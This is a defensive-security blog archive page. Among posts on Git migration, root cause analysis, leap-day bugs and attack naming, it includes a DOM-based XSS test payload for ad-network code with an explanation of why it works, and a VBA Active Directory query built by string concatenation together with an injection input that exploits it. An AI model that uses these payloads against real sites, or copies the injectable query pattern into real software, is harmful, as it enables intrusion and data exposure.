Programmer Hubris

Got on with Git

In which I move my version control from ComponentSoftware’s CS-RCS Pro to Git while preserving commit history.

[If you don’t want the back story, click here for the instructions!]

OK, so having watched the video I linked to earlier, I thought I’d move some of my old projects to Git.

I picked one at random, and went looking for tools.

I’m hampered a little by the fact that all my old projects used ComponentSoftware’s “CS-RCS Pro”.

Why did you choose CS-RCS Pro?

A couple of really good reasons:

  • It works on Windows
  • It integrates moderately well with Visual Studio through the VSS functionality
  • It’s compatible with GNU RCS, which I had some familiarity with
  • It was free if you’re the only dev on your projects

But you know who doesn’t use CS-RCS Pro any more?

That’s right, ComponentSoftware.

It’s a dead platform, unsupported, unpatched, and belongs off my systems.

So why’s it still there?

One simple reason – if I move off the platform, I face the usual choice when migrating from one version control system to another:

  • Carry all my history, so that I can review earlier versions of the code (for instance, when someone says they’ve got a new bug that never happened in the old version, or when I find a reversion, or when there’s a fix needed in one area of the code tree that I know I already made in a different area and just need to copy)
  • Lose all the history by starting fresh with the working copy of the source code

The second option seems a bit of a waste to me.

OK, so yes, technically I could mix the two modes, by using CS-RCS Pro to browse the ancient history when I need to, and Git to browse recent history, after starting Git from a clean working folder. But I could see a couple of problems:

  • Of course the bug I’m looking through history for is going to be across the two source control packages
  • It would mean I still have CS-RCS Pro sitting around installed, unpatched and likely vulnerable, on one of my dev systems

So, really, I wanted to make sure that I could move my files, history and all.

What stopped you?

I really didn’t have a good way to do it.

Clearly, any version control system can be moved to any other version control system by the simple expedient of:

  • For each change X:
    • Set the system date to X’s date
    • Fetch the old source control’s files from X into the workspace
    • Commit changes to the new source control, with any comments from X
    • Next change

But, as you can imagine, that’s really long-winded and manual. That should be automatable.

In fact, given the shared APIs of VSS-compatible source control services, I’m truly surprised that nobody has yet written a tool to do basically this task. I’d get on it myself, but I have other things to do. Maybe someone will write a “VSS2Git” or “VSS2VSS” toolkit to do just this.

There is a format for creating a single-file copy of a Git repository, which Git can process using the command “git fast-import”. So all I have to find is a tool that goes from a CS-RCS repository to the fast-import file format.

Nobody uses CS-RCS Pro

So, clearly there’s no tool to go from CS-RCS Pro to Git. There’s a tool to go from CS-RCS Pro to CVS, or there was, but that was on the now-defunct CS-RCS web site.

But… Remember I said that it’s compatible with GNU RCS.

And there’s scripts to go from GNU RCS to Git.

What you waiting for? Do it!

OK, so the script for this is written in Ruby, and as I read it, there seemed to be a few things that made it look like it might be for Linux only.

I really wasn’t interested in making a Linux VM (easy though that may be) just so I could convert my data.

So why are you writing this?

Everything changed with the arrival of the recent Windows 10 Anniversary Update, because along with it came a new component.

bashonubu

Bash on Ubuntu on Windows.

It’s like a Linux VM, without needing a VM, without having to install Linux, and it works really well.

With this, I could get all the tools I needed – GNU RCS, in case I needed it; Ruby; Git command line – and then I could try this out for myself.

Of course, I wouldn’t be publishing this if it wasn’t somewhat successful. But there are some caveats, OK?

Here’s the caveats

I’ve tried this a few times, on ONE of my own projects. This isn’t robustly tested, so if something goes all wrong, please by all means share, and people who are interested (maybe me) will probably offer suggestions, some of them useful. I’m not remotely warrantying this or suggesting it’s perfect. It may wipe your development history out of your one and only copy of version control… so don’t do it on your one and only copy. Make a backup first.

GNU RCS likes to store files in one of two places – either in the same directory as the working files, but with a “,v” pseudo-extension added to the filename, or in a sub-directory off each working folder, called “RCS” and with the same “,v” extension on the files. If you did either of these things, there’s no surprises. But…

CS-RCS Pro doesn’t do this. It has a separate RCS Repository Root. I put mine in C:\RCS, but you may have yours somewhere else. Underneath that RCS Repository Root is a full tree of the drives you’ve used CS-RCS to store (without the “:”), and a tree under that. I really hope you didn’t embed anything too deep, because that might bode ill.

Initially, this seemed like a bad thing, but because you don’t actually need the working files for this task, you can pretend that the RCS Repository is actually your working space.

Maybe this is obvious, but it took me a moment of thinking to decide I didn’t have to move files into RCS sub-folders of my working directories.

Make this a “flag day”. After you do this conversion, never use CS-RCS Pro again. It was good, and it did the job, and it’s now buried in the garden next to Old Yeller. Do not sprinkle the zombification water on that hallowed ground to revive it.

This also means you MUST check in all your code before converting, because checking it in afterwards will be … difficult.

Enough already, how do we do this?

Assumption: You have Windows 10.

  1. Install Windows 10 Anniversary Update – this is really easy, it’s an update, you’ve probably been offered it already, and you may even have installed it. This is how you’ll know you have it:
    capture20160826194922505
  2. Install Bash on Ubuntu on Windows – everyone else has written an article on how to do this, so here’s a link (I was going to link to the PC World article, but the full-page ad that popped up and obscured the screen, without letting me click the “no thanks” button persuaded me otherwise).
  3. Run the following commands in the bash shell:
    sudo apt-get update
    sudo apt-get install git
    sudo apt-get install ruby
  4. [Optional] Run “sudo apt-get instal rcs”, if you want to use the GNU RCS toolset to play with your original source control tree. Not sure I’d recommend doing too much of that.
  5. Change directory in the bash shell to a new, blank workspace folder you can afford to mess around in.
  6. Now a long bash command, but this really simply downloads the file containing rcs-fast-export:
    curl http://git.oblomov.eu/rcs-fast-export/blob_plain/c8a2bd6edbb21c1bfaf269ad1ec0e82af72c911a:/rcs-fast-export.rb -o rcs-fast-export.rb
  7. Make it executable with the command “chmod +x rcs-fast-export.rb”
  8. Git uses email addresses, rather than owner names, and it insists on them having angle brackets. If your username in CS-RCS Pro was “bob”, and your email address is “kate@example.com”, create an authors file with a bash command like this:
    echo “bob=Kate Smith <kate@example.com>” > AuthorsFile
  9. Now do the actual creation of the file to be imported, with this bash command:
    ./rcs-fast-export.rb -A AuthorsFile /mnt/c/RCS/…path-to-project… > project-name.gitexport
    [Note a couple of things here – starting with “./”, because that isn’t automatically in the PATH in Linux. Your Windows files are logically mounted in drives under /mnt, so C:\RCS is in /mnt/c/RCS. Case is important. Your “…path-to-project…” probably starts with “c/”, so that’s going to look like “/mnt/c/RCS/c/…” which might look awkward, but is correct. Use TAB-completion on folder names to help you.]
  10. Read the errors and correct any interesting ones.
  11. Now import the file into Git. We’re going to initialise a Git repository in the “.git” folder under the current folder, import the file, reset the head, and finally checkout all the files into the “master” branch under the current directory “.”. These are the bash commands to do this:
    git init
    git fast-import < project-name.gitexport
    git reset
    git checkout master .
  12. Profit!
  13. If you’re using Visual Studio and want to connect to this Git repository, remember that your Linux home directory sits under “%userprofile%\appdata\local\lxss\home”

This might look like a lot of instructions, but I mostly just wanted to be clear. This is really quick work. If you screw up after the “git init” command, simply “rm –rf .git” to remove the new repository.

The blame game: It’s always never human error

The Ubuntu “Circle of Friends” logo.

Depending on the kind of company you work at, it’s either:

  • a group of three friends holding hands and dancing in a merry circle
  • a group of three colleagues each pointing at the other two to tell you who to blame
  • three guys tied to a pole desperately trying to escape the rising orange flood waters

If you work at the first place, reach out to me on LinkedIn – I know some people who might want to work with you.

If you’re at the third place, you should probably get out now. Whatever they’re paying you, or however much the stock might be worth come the IPO, it’s not worth the pain and suffering.

If you’re at the second place, congratulations – you’re at a regular, ordinary workplace that could do with a little better management.

What’s this to do with security?

A surprisingly great deal.

Whenever there’s a security incident, there should be an investigation as to its cause.

Clearly the cause is always human error. Machines don’t make mistakes, they act in predictable ways – even when they are acting randomly, they can be stochastically modeled, and errors taken into consideration. Your computer behaves like a predictable machine, but at various levels it actually routinely behaves like it’s rolling dice, and there are mechanisms in place to bias those random results towards the predictable answers you expect from it.

Humans, not so much.

Humans make all the mistakes. They choose to continue using parts that are likely to break, because they are past their supported lifecycle; they choose to implement only part of a security mechanism; they forget to finish implementing functionality; they fail to understand the problem at hand; etc, etc.

It always comes back to human error.

Or so you think

Occasionally I will experience these great flashes of inspiration from observing behaviour, and these flashes dramatically affect my way of doing things.

One such was when I attended the weekly incident review board meetings at my employer of the time – a health insurance company.

Once each incident had been resolved and addressed, they were submitted to the incident review board for discussion, so that the company could learn from the cause of the problem, and make sure similar problems were forestalled in future.

These weren’t just security incidents, they could be system outages, problems with power supplies, really anything that wasn’t quickly fixed as part of normal process.

But the principles I learned there apply just as well to security incident.

Root cause analysis

The biggest principle I learned was “root cause analysis” – that you look beyond the immediate cause of a problem to find what actually caused it in the long view.

At other companies, who can’t bear to think that they didn’t invent absolutely everything, this is termed differently, for instance, “the five whys” (suggesting if you ask “why did that happen?” five times, you’ll get to the root cause). Other names are possible, but the majority of the English-speaking world knows it as ‘root cause analysis’

This is where I learned that if you believe the answer is that a single human’s error caused the problem, you don’t have the root cause.

But!

Whenever I discuss this with friends, they always say “But! What about this example, or that?”

You should always ask those questions.

Here’s some possible individual causes, and some of their associated actual causes:

Bob pulled the wrong lever Who trained Bob about the levers to pull? Was there documentation? Were the levers labeled? Did anyone assess Bob’s ability to identify the right lever to pull by testing him with scenarios?
Kate was evil and did a bad thing Why was Kate allowed to have unsupervised access? Where was the monitoring? Did we hire Kate? Why didn’t the background check identify the evil?
Jeremy told everyone the wrong information Was Jeremy given the right information? Why was Jeremy able to interpret the information from right to wrong? Should this information have been automatically communicated without going through a Jeremy? Was Jeremy trained in how to transmute information? Why did nobody receiving the information verify it?
Grace left her laptop in a taxi Why does Grace have data that we care about losing – on her laptop? Can we disable the laptop remotely? Why does she even have a laptop? What is our general solution for people, who will be people, leaving laptops in a taxi?
Jane wrote the algorithm with a bug in it Who reviews Jane’s code? Who tests the code? Is the test automated? Was Jane given adequate training and resources to write the algorithm in the first place? Is this her first time writing an algorithm – did she need help? Who hired Jane for that position – what process did they follow?

 

I could go on and on, and I usually do, but it’s important to remember that if you ever find yourself blaming an individual and saying “human error caused this fault”, it’s important to remember that humans, just like machines, are random and only stochastically predictable, and if you want to get predictable results, you have to have a framework that brings that randomness and unpredictability into some form of logical operation.

Many of the questions I asked above are also going to end up with the blame apparently being assigned to an individual – that’s just a sign that it needs to keep going until you find an organisational fix. Because if all you do is fix individuals, and you hire new individuals and lose old individuals, your organisation itself will never improve.

[Yes, for the pedants, your organisation is made up of individuals, and any organisational fix is embodied in those individuals – so blog about how the organisation can train individuals to make sure that organisational learning is passed on.]

Finally, if you’d like to not use Ubuntu as my “circle of blame” logo, there’s plenty of others out there – for instance, Microsoft Alumni:

Microsoft Alumni

On Widespread XSS in Ad Networks

Randy Westergren posted a really great piece entitled “Widespread XSS Vulnerabilities in Ad Network Code Affecting Top Tier Publishers, Retailers

Go read it – I’ll wait.

The article triggered a lot of thoughts that I’ll enumerate here:

This is not a new thing – and that’s bad

This was reported by SoftPedia as a “new attack”, but it’s really an old attack. This is just another way to execute DOM-based XSS.

That means that web sites are being attacked by old bugs, not because their own coding is bad, but because they choose to make money from advertising.

And because the advertising industry is just waaaay behind on securing their code, despite being effectively a widely-used framework across the web.

You’ve seen previously on my blog how I attacked Troy Hunt’s blog through his advertising provider, and he’s not the first, or by any means the last, “victim” of my occasional searches for flaws.

It’s often difficult to trace which ad provider is responsible for a piece of vulnerable code, and the hosting site may not realise the nature of their relationship and its impact on security. As a security researcher, it’s difficult to get traction on getting these vulnerabilities fixed.

Important note

I’m trying to get one ad provider right now to fix their code. I reported a bug to them, they pointed out it was similar to the work Randy Westergren had written up.

So they are aware of the problem.

It’s over a month later, and the sites I pointed out to them as proofs of concept are still vulnerable.

Partly, this is because I couldn’t get a reliable repro as different ad providers loaded up, but it’s been two weeks since I sent them a reliable repro – which is still working.

Reported a month ago, reliable repro two weeks ago, and still vulnerable everywhere.

[If you’re defending a site and want to figure out which ad provider is at fault, inject a “debugger” statement into the payload, to have the debugger break at the line that’s causing a problem. You may need to do this by replacing “prompt()” or “alert()” with “(function(){debugger})()” – note that it’ll only break into the debugger if you have the debugger open at the time.]

How the “#” affects the URL as a whole

Randy’s attack example uses a symbol you won’t see at all in some web sites, but which you can’t get away from in others. The “#” or “hash” symbol, also known as “number” or “hash”. [Don’t call it “pound”, please, that’s a different symbol altogether, “£”] Here’s his example:

http://nypost.com/#1'-alert(1)-'"-alert(1)-"

Different parts of the URL have different names. The “http:” part is the “protocol”, which tells the browser how to connect and what commands will likely work. “//nypost.com/” is the host part, and tells the browser where to connect to. Sometimes a port number is used – commonly, 80 or 443 – after the host name but before the terminating “/” of the host element. Anything after the host part, and before a question-mark or hash sign, is the “path” – in Randy’s example, the path is left out, indicating he wants the root page. An optional “query” part follows the path, indicated by a question mark at its start, often taking up the rest of the URL. Finally, if a “#” character is encountered, this starts the “anchor” part, which is everything from after the “#” character on to the end of the URL.

The “anchor” has a couple of purposes, one by design, and one by evolution. The designed use is to tell the browser where to place the cursor – where to scroll to. I find this really handy if I want to draw someone’s attention to a particular place in an article, rather than have them read the whole story. [It can also be used to trigger an onfocus event handler in some browsers]

The second use is for communication between components on the page, or even on other pages loaded in frames.

The anchor tag is for the browser only

I want to emphasise this – and while Randy also mentioned it, I think many web site developers need to understand this when dealing with security.

The anchor tag is not sent to the server.

The anchor tag does not appear in your server’s logs.

WAFs cannot filter the anchor tag.

If your site is being attacked through abuse of the anchor tag, you not only can’t detect it ahead of time, you can’t do basic forensic work to find out useful things such as “when did the attack start”, “what sort of things was the attacker doing”, “how many attacks happened”, etc.

[Caveat: pedants will note that when browser code acts on the contents of the anchor tag, some of that action will go back to the server. That’s not the same as finding the bare URL in your log files.]

If you have an XSS that can be triggered by code in an anchor tag, it is a “DOM-based XSS” flaw. This means that the exploit happens primarily (or only) in the user’s browser, and no filtering on the server side, or in the WAF (a traditional, but often unreliable, measure against XSS attacks), will protect you.

When trying out XSS attacks to find and fix them, you should try attacks in the anchor tag, in the query string, and in the path elements of the URL if at all possible, because they each will get parsed in different ways, and will demonstrate different bugs.

What does “-alert(1)-“ even mean?

The construction Randy uses may seem a little odd:

"-alert(1)-"'-alert(1)-'

With some experience, you can look at this and note that it’s an attempt to inject JavaScript, not HTML, into a quoted string whose injection point doesn’t properly (or at all) escape quotes. The two different quote styles will escape from quoted strings inside double quotes and single quotes alike (I like to put the number ‘2’ in the alert that is escaped by the double quotes, so I know which quote is escaped).

But why use a minus sign?

Surely it’s invalid syntax?

While JavaScript knows that “string minus void” isn’t a valid operation, in order to discover the types of the two arguments to the “minus” operator, it actually has to evaluate them. This is a usual side-effect of a dynamic language – in order to determine whether an operation is valid, its arguments have to be evaluated. Compiled languages are usually able to identify specific types at compile time, and tell you when you have an invalid operand.

So, now that we know you can use any operator in there – minus, times, plus, divide, and, or, etc – why choose the minus? Here’s my reasoning: a plus sign in a URL is converted to a space. A divide (“/”) is often a path component, and like multiplication (“*”) is part of a comment sequence in JavaScript, “//” or “/*”, an “&” is often used to separate arguments in a query string, and a “|” for “or” is possibly going to trigger different flaws such as command injection, and so is best saved for later.

Also, the minus sign is an unshifted character and quick to type.

There are so many other ways to exploit this – finishing the alert with a line-ending comment (“//” or “<–”), using “prompt” or “confirm” instead of “alert”, using JavaScript obfuscaters, etc, but this is a really good easy injection point.

Another JavaScript syntax abuse is simply to drop “</script>” in the middle of the JavaScript block and then start a new script block, or even just regular HTML. Remember that the HTML parser only hands off to the JavaScript parser once it has found a block between “<script …>” and “</script …>” tags. It doesn’t matter if the closing tag is “within” a JavaScript string, because the HTML parser doesn’t know JavaScript.

There’s no single ad provider, and they’re almost all vulnerable

Part of the challenge in repeating these attacks, demonstrating them to others, etc, is that there’s no single ad provider, even on an individual web site.

Two visits to the same web site not only bring back different adverts, but they come through different pieces of code, injected in different ways.

If you don’t capture your successful attack, it may not be possible to reproduce it.

Similarly, if you don’t capture a malicious advert, it may not be possible to prove who provided it to you. I ran into this today with a “fake BSOD” malvert, which pretended to be describing a system error, and filled as much of my screen as it could with a large “alert” dialog, which kept returning immediately, whenever it was dismissed, and which invited me to call for “tech support” to fix my system. Sadly, I wasn’t tracing my every move, so I didn’t get a chance to discover how this ad was delivered, and could only rage at the company hosting the page.

This is one reason why I support ad-blockers

Clearly, ad providers need to improve their security. Until such time as they do so, a great protection is to use an ad-blocker. This may prevent you from seeing actual content at some sites, but you have to ask yourself if that content is worth the security risk of exposing yourself to adverts.

There is a valid argument to be made that ad blockers reduce the ability of content providers to make legitimate profit from their content.

But there is also a valid argument that ad blockers protect users from insecure adverts.

Defence – protect your customers from your ads

Finally, if you’re running a web site that makes its money from ads, you need to behave proactively to prevent your users from being targeted by rogue advertisers.

I’m sure you believe that you have a strong, trusting relationship with the ad providers you have running ads on your web site.

Don’t trust them. They are not a part of your dev team. They see your customers as livestock – product. Your goals are substantially different, and that means that you shouldn’t allow them to write code that runs in your web site’s security context.

What this means is that you should always embed those advertising providers inside an iframe of their own. If they give you code to run, and tell you it’s to create the iframe in which they’ll site, put that code in an iframe you host on a domain outside your main domain. Because you don’t trust that code.

Why am I suggesting you do that? Because it’s the difference between allowing an advert attack to have limited control, and allowing it to have complete control, over your web site.

If I attack an ad in an iframe, I can modify the contents of the iframe, I can pop up a global alert, and I can send the user to a new page.

If I attack an ad – or its loading code – and it isn’t in an iframe, I can still do all that, but I can also modify the entire page, read secret cookies, insert my own cookies, interact with the user as if I am the site hosting the ad, etc.

If you won’t do it for your customers, at least defend your own page

capture20160409090703064

Here’s the front page of a major website with a short script running through an advert with a bug in it.

[I like the tag at the bottom left]

Insist on security clauses with all your ad providers

Add security clauses in to your contracts , so that you can pull an ad provider immediately a security vulnerability is reported to you, and so that the ad providers are aware that you have an interest in the security and integrity of your page and your users. Ask for information on how they enforce security, and how they expect you to securely include them in your page.

[I am not a lawyer, so please talk with someone who is!]

We didn’t even talk about malverts yet

Malverts – malicious advertising – is the term for an attacker getting an ad provider to deliver their attack code to your users, by signing up to provide an ad. Often this is done using apparent advertising copy related to current advertising campaigns, and can look incredibly legitimate. Sometimes, the attack code will be delayed, or region-specific, so an ad provider can’t easily notice it when they review the campaign for inclusion in your web page.

Got a virus you want to distribute? Why write distribution code and try to trick a few people into running it, when for a few dollars, you can get an ad provider to distribute it for you to several thousand people on a popular web site for people who have money?

Leap Day again

I’ve mentioned before how much I love the vagaries of dates and times in computing, and I’m glad it’s not a part of my regular day-to-day work or hobby coding.

Here’s some of the things I expect to happen this year as a result of the leap year:

  • Hey, it’s February 29 – some programs, maybe even operating systems, will refuse to recognise the day and think it’s actually March 1. Good luck figuring out how to mesh that with other calendar activities. Or maybe you’ll be particularly unlucky, and the app/OS will break completely.
  • But the fun’s not over, as every day after February 29, until March 1 NEXT YEAR, you’re a full 366 days ahead of the same date last year. So, did you create a certificate that expires next year, last year? If so, I hope you have a reminder well ahead of time to renew the certificate, because otherwise, your certificate probably expires 365 days ahead, not one year. Or maybe it’ll just create an invalid certificate when you renew one today.
  • The same is true for calendar reminders – some reminders for “a year ahead” will be 365 days ahead, not one year. Programmers often can’t tell the difference between AddDays(365) and AddYears(1) – and why would they, when the latter is difficult to define unambiguously (add a year to today’s date, what do you get? February 28 or March 1?)
  • But the fun’s not over yet – we’ve still got December 31 to deal with. Why’s that odd? Normal years have a December 31, so that’s no problem, right? Uh, yeah, except that’s day 366. And that’s been known to cause developers a problem – see what it did to the Zune a few years back.
  • Finally, please don’t tell me I have an extra day and ask me what I’m going to do with it – the day, unless you got a day off, or are paid hourly, belongs to your employer, not to you – they have an extra day’s work from you this year, without adding to your salary at all.

And then there’s the ordinary issues with dates that programmers can’t understand – like the fact that there are more than 52 weeks in a year. “ASSERT(weeknum>0 && weeknum<53);”, anyone? 52 weeks is 364 days, and every year has more days than that. [Pedantic mathematical note – maybe this somewhat offsets the “employer’s extra day” item above]

Happy Leap Day – and always remember to test your code in your head as well as in real life, to find its extreme input cases and associated behaviours. They’ll get tested anyway, but you don’t want it to be your users who find the bugs.

Why am I so cross?

There are many reasons why Information Security hasn’t had as big an impact as it deserves. Some are external – lack of funding, lack of concern, poor management, distractions from valuable tasks, etc, etc.

But the ones we inflict on ourselves are probably the most irritating. They make me really cross.

Why cross?

OK, “cross” is an English term for “angry”, or “irate”, but as with many other English words, it’s got a few other meanings as well.

It can mean to wrong someone, or go against them – “I can’t believe you crossed Fingers MacGee”.

It can mean to make the sign of a cross – “Did you just cross your fingers?”

It can mean a pair of items, intersecting one another – “I’m drinking at the sign of the Skull and Cross-bones”.

It can mean to breed two different subspecies into a third – “What do you get if you cross a mountaineer with a mosquito? Nothing, you can’t cross a scaler and a vector.”

Or it can mean to traverse something – “I don’t care what Darth Vader says, I always cross the road here”.

Green_cross_man_take_it

It’s this last sense that InfoSec people seem obsessed about, to the extent that every other attack seems to require it as its first word.

Such a cross-patch

These are just a list of the attacks at OWASP that begin with the word “Cross”.

Yesterday I had a meeting to discuss how to address three bugs found in a scan, and I swear I spent more than half the meeting trying to ensure that the PM and the Developer in the room were both discussing the same bug. [And here, I paraphrase]

“How long will it take you to fix the Cross-Frame Scripting bug?”

“We just told you, it’s going to take a couple of days.”

“No, that was for the Cross-Site Scripting bug. I’m talking about the Cross-Frame Scripting issue.”

“Oh, that should only take a couple of days, because all we need to do is encode the contents of the field.”

“No, again, that’s the Cross-Site Scripting bug. We already discussed that.”

“I wish you’d make it clear what you’re talking about.”

Yeah, me too.

A modest proposal

The whole point of the word “Cross” as used in the descriptions of these bugs is to indicate that someone is doing something they shouldn’t – and in that respect, it’s pretty much a completely irrelevant word, because we’re already discussing attack types.

In many of these cases, the words “Cross-Site” bring absolutely nothing to the discussion, and just make things confusing. Am I crossing a site from one page to another, or am I saying this attack occurs between sites? What if there’s no other site involved, is that still a cross-site scripting attack? [Yes, but that’s an irrelevant question, and by asking it, or thinking about asking/answering it, you’ve reduced your mental processing abilities to handle the actual issue.]

Check yourself when you utter “cross” as the first word in the description of an attack, and ask if you’re communicating something of use, or just “sounding like a proper InfoSec tool”. Consider whether there’s a better term to use.

I’ve previously argued that “Cross-Site Scripting” is really a poor term for the conflation of HTML Injection and JavaScript Injection.

Cross-Frame Scripting is really Click-Jacking (and yes, that doesn’t exclude clickjacking activities done by a keyboard or other non-mouse source).

Cross-Site Request Forgery is more of a Forced Action – an attacker can guess what URL would cause an action without further user input, and can cause a user to visit that URL in a hidden manner.

Cross-Site History Manipulation is more of a browser failure to protect SOP – I’m not an expert in that field, so I’ll leave it to them to figure out a non-confusing name.

Cross-Site Tracing is just getting silly – it’s Cross-Site Scripting (excuse me, HTML Injection) using the TRACE verb instead of the GET verb. If you allow TRACE, you’ve got bigger problems than XSS.

Cross-User Defacement crosses all the way into crosstalk, requiring as it does that two users be sharing the same TCP connection with no adequate delineation between them. This isn’t really common enough to need a name that gets capitalised. It’s HTTP Response-Splitting over a shared proxy with shitty user segregation.

Even more modestly…

I don’t remotely anticipate that I’ll change the names people give to these vulnerabilities in scanning tools or in pen-test reports.

But I do hope you’ll be able to use these to stop confusion in its tracks, as I did:

“Never mind cross-whatever, let’s talk about how long it’s going to take you to address the clickjacking issue.”

In Summary

Here’s the TL;DR version of the web post:

Prevent or interrupt confusion by referring to bugs using the following non-confusing terms:

Confusing Not Confusing Much, Probably
Cross-Frame Scripting Clickjacking
Cross-Site History Manipulation [Not common enough to name]
Cross-Site Tracing TRACE is enabled
Cross-Site Request Forgery Forced User Action
Cross-Site Scripting HTML Injection
JavaScript Injection
Cross-User Defacement Crappy proxy server

Fear the browsing dead!

Browsing Dead

Ding dong, the plugin’s dead!

There’s been a lot of celebration lately from the security community about the impending death of Adobe’s Flash, or Oracle’s Java plugin technology.

You can understand this, because for years these plugins have been responsible for vulnerability on top of vulnerability. Their combination of web-facing access and native code execution means that you have maximum exposure and maximum risk concentrated in one place on the machine.

Browser manufacturers have recognised this risk in their own code, and have made great strides in improving security. Plus, you can always switch browsers if you feel one is more secure than another.

Attackers can rely on Flash and Java.

An attacker can pretty much assume that their target is running Flash from Adobe, and Java from Oracle. [Microsoft used to have a competing Java implementation, but Oracle sued it out of existence.]

Bugs in those implementations are widely published, and not widely patched, whether or not patches are available.

Users don’t upgrade applications (plugins included) as often or as willingly as they update their operating system. So, while your browser may be updated with the operating system, or automatically self-update, it’s likely most users are running a version of Java and/or Flash that’s several versions behind.

Applications never die, they just lose their support

As you can imagine, the declaration by Oracle that Java plugin support will be removed is a step forward in recognising the changing landscape of browser security, but it’s not an indication that this is an area in which security professionals can relax.

Just the opposite.

With the deprecation of plugin support comes the following:

  • Known bugs – without fixes. Ever.
  • No availability of tools to manage old versions.
  • No tools to protect vulnerable plugins.
  • Users desperately finding more baroque (and unsecurable) ways to keep their older setups together to continue to use applications which should have been replaced, but never were.

It’s not like Oracle are going to reach into every machine and uninstall / turn off plugin support. Even if they had the technical means to do so, such an act would be a completely inappropriate act.

There will be zombies

So, what we’re left with, whenever a company deprecates a product, application or framework, is a group of machines – zombies, if you will – that are operated by people who do not heed the call to cull, and which are going to remain active and vulnerable until such time as someone renders those walking-dead components finally lifeless.

If you’re managing an enterprise from a security perspective, you should follow up every deprecation announcement with a project to decide the impact and schedule the actual death and dismemberment of the component being killed off.

Then you can celebrate!

Assuming, of course, that you followed through successfully on your plan.

Until then, watch out for the zombies.

The Browsing Dead.

Artisan or Labourer?

Back when I started developing code, and that was a fairly long time ago, the vast majority of developers I interacted with had taken that job because they were excited to be working with technology, and enjoyed instructing and controlling computers to an extent that was perhaps verging on the creepy.

Much of what I read about application security strongly reflects this even today, where developers are exhorted to remember that security is an aspect of the overall quality of your work as a developer.

This is great – for those developers who care about the quality of their work. The artisans, if you like.

But who else is there?

For every artisan I meet when talking to developers, there’s about another two or three who are more like labourers.

They turn up on time, they do their daily grind, and they leave on time. Even if the time expected / demanded of them is longer than the usual eight hours a day.

By itself, this isn’t a bad thing. When you need another pair of “OK” and “Cancel” buttons, you want someone to hammer them out, not hand-craft them in bronze. When you need an API to a back-end database, you want it thin and functional, not baroque and beautiful.

Many – perhaps most – of your developers are there to do a job for pay, not because they love code.

And that’s what you interviewed them for, hired them for, and promoted them for.

It’s important to note that these guys mostly do what they are told. They are clever, and can be told to do complex things, but they are not single-mindedly interested in the software they are building, except in as much as you will reward them for delivering it.

What do you tell these guys?

If these developers will build only the software they’re told to build, what are you telling them to build?

At any stage, are you actively telling your developers that they have to adhere to security policies, or that they have to build in any kind of “security best practice”, or even to “think like an attacker” (much as I hate that phrase) – I’d rather you tell them to “think about all the ways every part of your code can fail, and work to prevent them” [“think like a defender”]?

Some of your developers will interject their own ideas of quality.

– But –

Most of your developers will only do as they have been instructed, and as their examples tell them.

How does this affect AppSec?

The first thing to note is that you won’t reach these developers just with optional training, and you might not even reach them just with mandatory training. They will turn up to mandatory training, because it is required of them, and they may turn up to optional training because they get a day’s pay for it. But all the appeals to them to take on board the information you’re giving them will fall upon deaf ears, if they return to their desks and don’t get follow-up from their managers.

Training requires management support, management enforcement, and management follow-through.

When your AppSec program makes training happen, your developers’ managers must make it clear to their developers that they are expected to take part, they are expected to learn something, and they are expected to come back and start using and demonstrating what they have learned.

Curiously enough, that’s also helpful for the artisans.

Second, don’t despair about these developers. They are useful and necessary, and as with all binary distinctions, the lines are not black and white, they are a spectrum of colours. There are developers at all stages between the “I turn up at 10, I work until 6 (as far as you know), and I do exactly what I’m told” end and the “I love this software as if it were my own child, and I want to mould it into a perfect shining paragon of perfection” end.

Don’t despair, but be realistic about who you have hired, and who you will hire as a result of your interview techniques.

Work with the developers you have, not the ones you wish you had.

Third, if you want more artisans and fewer labourers, the only way to do that is to change your hiring and promotion techniques.

Screen for quality-biased developers during the interview process. Ask them “what’s wrong with the code”, and reward them for saying “it’s not very easy to understand, the comments are awful, it uses too many complex constructs for the job it’s doing, etc”.

Reward quality where you find it. “We had feedback from one of the other developers on the team that you spent longer on this project than expected, but produced code that works flawlessly and is easy to maintain – you exceed expectations.”

Security is a subset of quality – encourage quality, and you encourage security.

Labourers as opposed to artisans have no internal “quality itch” to scratch, which means quality bars must be externally imposed, measured, and enforced.

What are you doing to reward developers for securing their development?

SQL injection in unexpected places

Every so often, I write about some real-world problems in this blog, rather than just getting excited about generalities. This is one of those times.

1. In which I am an idiot who thinks he is clever

I had a list of users the other day, exported from a partner with whom we do SSO, and which somehow had some duplicate entries in.

These were not duplicate in the sense of “exactly the same data in every field”, but differed by email address, and sometimes last name. Those of you who manage identity databases will know exactly what I’m dealing with here – people change their last name, through marriage, divorce, adoption, gender reassignment, whim or other reason, and instead of editing the existing entry, a new entry is somehow populated to the list of identities.

What hadn’t changed was that each of these individuals still held their old email address in Active Directory, so all I had to do was look up each email address, relate it to a particular user, and then pull out the canonical email address for that user. [In this case, that’s the first email address returned from AD]

A quick search on the interwebs gave me this as a suggested VBA function to do just that:

   1: Function GetEmail(email as String) as String

   2: ' Given one of this users' email addresses, find the canonical one.

   3:  

   4: ' Find our default domain base to search from

   5: Set objRootDSE = GetObject("LDAP://RootDSE")

   6: strBase = "'LDAP://" & objRootDSE.Get("defaultNamingContext") & "'"

   7:  

   8: ' Open a connection to AD

   9: Set ADOConnection = CreateObject("ADODB.Connection")

  10: ADOConnection.Provider = "ADsDSOObject"

  11: ADOConnection.Open "Active Directory Provider"

  12:  

  13: ' Create a command

  14: Set ADCommand = CreateObject("ADODB.Command")

  15: ADCommand.ActiveConnection = ADOConnection

  16:  

  17: 'Find user based on their email address

  18: ADCommand.CommandText = _

  19:     "SELECT distinguishedName,userPrincipalName,mail FROM " & _

  20:     strBase & " WHERE objectCategory='user' and mail='" & email & "'"

  21:  

  22: ' Execute this command

  23: Set ADRecordSet = ADCommand.Execute

  24:  

  25: ' Extract the canonical email address for this user.

  26: GetEmail = ADRecordSet.Fields("Mail")

  27:  

  28: ' Return.

  29: End Function

That did the trick, and I stopped thinking about it. Printed out the source just to demonstrate to a couple of people that this is not rocket surgery.

2. In which I realise I am idiot

Yesterday the printout caught my eye. Here’s the particular line that made me stop:

  18: ADCommand.CommandText = _

  19:     "SELECT distinguishedName,userPrincipalName,mail FROM " & _

  20:     strBase & " WHERE objectCategory='user' AND mail='" & email & "'"

That looks like a SQL query, doesn’t it?

Probably because it is.

It’s one of two formats that can be used to query Active Directory, the other being the less-readable LDAP syntax.

Both formats have the same problem – when you build the query using string concatenation like this, it’s possible for the input to give you an injection by escaping from the data and into the code.

I checked this out – when I called this function as follows, I got the first email address in the list as a response:

   1: Debug.Print GetEmail("x' OR mail='*")

